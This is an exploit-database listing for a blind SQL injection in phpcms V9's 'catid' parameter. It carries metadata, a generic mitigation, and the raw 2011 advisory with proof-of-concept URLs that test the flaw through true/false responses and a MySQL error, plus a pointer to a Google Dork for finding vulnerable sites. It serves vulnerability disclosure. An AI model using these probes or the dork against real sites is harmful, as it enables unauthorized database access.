header-logo
Suggest Exploit
vendor:
phpcms V9
by:
eidelweiss
8.8
CVSS
HIGH
BLind SQL Injection
89
CWE
Product Name: phpcms V9
Affected Version From: V9
Affected Version To: V9
Patch Exists: NO
Related CWE: N/A
CPE: a:phpcms:phpcms_v9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

phpcms V9 BLind SQL Injection Vulnerability

phpcms V9 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'catid' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious 'catid' parameter. This will allow the attacker to execute arbitrary SQL commands on the underlying database. The vulnerability can be exploited by sending a specially crafted HTTP request with a malicious 'catid' parameter.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

=================================================================
	phpcms V9 BLind SQL Injection Vulnerability
=================================================================

Software:	phpcms V9
Vendor:		www.phpcms.cn
Vuln Type:	BLind SQL Injection
Download link:	http://www.phpcms.cn/2010/1229/326.html
Author:		eidelweiss
contact:	eidelweiss[at]windowslive[dot]com
Home:		www.eidelweiss.info

Google Dork:	http://www.exploit-db.com/ghdb/3676/	// check here ^_^

References:
http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html

=================================================================

	exploit & p0c

[!]	index.php?m=content&c=rss&catid=[valid catid]

	Example p0c

[!]	http://host/index.php?m=content&c=rss&catid=10	<= True
[!]	http://host/index.php?m=content&c=rss&catid=-10	<= False

[+]	http://host/index.php?m=content&c=rss&catid=5	<= show MySQL Error (table)

=================================================================

	Nothing Impossible In This World Even Nobody`s Perfect

=================================================================

=========================| -=[ E0F ]=- |=========================